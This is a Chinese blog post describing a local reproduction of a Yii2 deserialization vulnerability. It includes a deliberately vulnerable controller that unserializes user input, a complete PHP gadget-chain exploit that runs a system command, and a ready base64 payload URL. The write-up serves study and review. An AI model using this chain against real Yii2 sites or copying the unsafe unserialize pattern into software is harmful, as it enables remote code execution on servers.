首页 > 其他 > 详细

Yii2 反序列化漏洞复现

时间:2021-05-21 14:29:06      阅读:26      评论:0      收藏:0      [点我收藏+]

Yii2 反序列化漏洞复现

前言

  • 之前红帽杯做题时碰到的,当时没细究,现在来本地搭建复现一下
  • 原理性的内容就不多说了,本文也只是为了记录一下我复现时候的过程,方便后面复习时用

环境搭建

  • 本来想跟着网上大多数人的那种教程一样,直接从GitHub下载源码,然后docker-compose up安装,但是一直没能成功,后续想尝试着直接Windows上安装,但是过程过于复杂,所以最终还是选择直接docker安装

docker 搭建Yii2环境

  • 直接docker searche yii2
    技术分享图片
  • 我选择的是schmunk42/yii2-app-basic,然后直接docker pull schmunk42/yii2-app-basic 拖取镜像即可
    技术分享图片
  • 启动镜像docker run -d -P schmunk42/yii2-app-basic
    技术分享图片
  • 访问ip:49153,出现以下界面即搭建完成
    技术分享图片

漏洞复现

创建一个存在漏洞的Action:/controllers/TestController.php

  • 代码如下:
<?php

namespace app\controllers;

use Yii;
use yii\web\Controller;

class TestController extends Controller
{
	public function actionTest(){
		$name = Yii::$app->request->get(‘unserialize‘);
		return unserialize(base64_decode($name));
	}
}

技术分享图片

  • 利用网上给出的exp进行复现执行系统命令
<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = ‘system‘;
            $this->id = ‘ls -al‘;
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters[‘close‘] = [new CreateAction, ‘run‘];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
  • 利用在线php代码执行平台运行生成payload
/index.php?r=test/test&unserialize=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ

技术分享图片

参考链接

  • https://xz.aliyun.com/t/8307?page=5
  • https://anquan.baidu.com/article/1260

Yii2 反序列化漏洞复现

原文:https://www.cnblogs.com/Konmu/p/14793335.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!